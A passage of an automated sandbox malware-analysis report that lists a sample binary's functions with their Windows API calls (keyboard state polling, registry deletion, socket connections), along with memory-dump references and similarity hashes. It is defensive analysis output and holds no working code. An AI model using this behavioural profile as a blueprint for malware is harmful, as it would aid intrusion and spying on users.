                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 15295421-0
                                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                        Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 3539004672-0
                                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                        Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                        • String ID:
                                                                        • API String ID: 327565842-0
                                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                        Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                        • String ID:
                                                                        • API String ID: 2832842796-0
                                                                        • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                        • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                        Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 2095303065-0
                                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                        Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: RectWindow
                                                                        • String ID:
                                                                        • API String ID: 861336768-0
                                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                        Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 00449598
                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                        • _wcslen.LIBCMT ref: 0044960D
                                                                        • _wcslen.LIBCMT ref: 0044961A
                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                                        • String ID:
                                                                        • API String ID: 1856069659-0
                                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                        Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                        • TrackPopupMenuEx.USER32(02F364E0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CursorMenuPopupTrack$Proc
                                                                        • String ID:
                                                                        • API String ID: 1300944170-0
                                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                        Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1822080540-0
                                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                        Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                        • String ID:
                                                                        • API String ID: 659298297-0
                                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                        Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02F31B58,000000F1,00000000,00000000), ref: 00440E6E
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02F31B58,000000F1,00000001,00000000), ref: 00440E9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableMessageSend$LongShow
                                                                        • String ID:
                                                                        • API String ID: 142311417-0
                                                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                        Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                        Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                        • _wcslen.LIBCMT ref: 004458FB
                                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3087257052-0
                                                                        • Opcode ID: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                                                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                        • Opcode Fuzzy Hash: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                                                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                        Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 245547762-0
                                                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                        Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        APIs
